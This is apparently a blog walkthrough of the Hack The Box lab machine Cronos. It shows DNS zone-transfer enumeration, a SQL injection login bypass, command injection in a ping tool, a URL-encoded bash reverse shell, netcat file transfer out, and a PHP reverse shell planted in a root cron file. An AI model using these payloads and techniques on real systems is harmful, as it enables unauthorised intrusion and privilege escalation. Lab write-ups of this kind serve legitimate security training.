SecWalk.com

HTB Walkthrough Cronos 10.10.10.13

Box summary:

Cronos has been released in 2017, Cronos is rated as medium.

By scanning the machine we found out that there is DNS running on the system,By querying the DNS server, we found out there is an subdomain called; admin.cronos.htb. That subdomain is vulnerable to a SQL injection bypass. After we successfully bypass the login page, we found out that there was a ping tool that is vulnerable to code execution which enables us to gain a user level system access. Since we have user level access we want to expand that to root level system access, we where able to do then by exploiting a Cronjob.

Enumeration

Nmap

nmap -sV -sC  10.10.10.13

Domain enumeration

I saw that port 53 (DNS) is open to I try to enumerate the DNS to query the DNS records.

dig axfr @10.10.10.13 cronos.htb

I added admin.cronos.htb to /etc/hosts file.

Web Page Enumeration

We see a login page.

I tried basic SQL bypass and I succeed.

‘ or 1=1– –


Exploitation

After we successful logged, we see the following page.

I started Burp Suite, and intercepted the request.

Basic Command Execution

I tried to ping myself first. In order to test if we have indeed command execution.

Before I execute it, I started tcpdump in order to catch the ICMP packet.

tcpdump -i tun0 icmp

Getting Reverse Shell

Now that our command execution is confirmed, we can change the ping payload to a reverse shell payload.

bash+-c+’bash+-i+>%26+/dev/tcp/10.10.14.4/1234+0>%261’%26

Now we have a reverse shell.



Post-Exploitation

By basic enumeration, I found an interesting crontab.

 

File Transfer with Netcat

By viewing the directory, I can modify 1 file(artisan). By putting there, a reverse shell that will gives us a root shell back.

First, I downloaded the file to my system in order to modify it.

                On Target System: nc -nv 10.10.14.4 1234 < artisan

                On My Own System: nc -lnvp 1234 > artisan


Modify Artisan File

I added the following 2 lines to the file:

$sock=fsockopen("10.10.14.4", 1234);

exec("/bin/sh -i <&3 >&3 2>&3");

After this I transferred the file back to the target system, and overwrite the current artisan file.

                On Target System; wget http://10.10.14.4:8000/artisan

                On Kali System: python3 -m http.server


Root Shell

Now we have a root shell.

whoami && ifconfig && cat root.txt; echo

Made by: IceL0rd

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply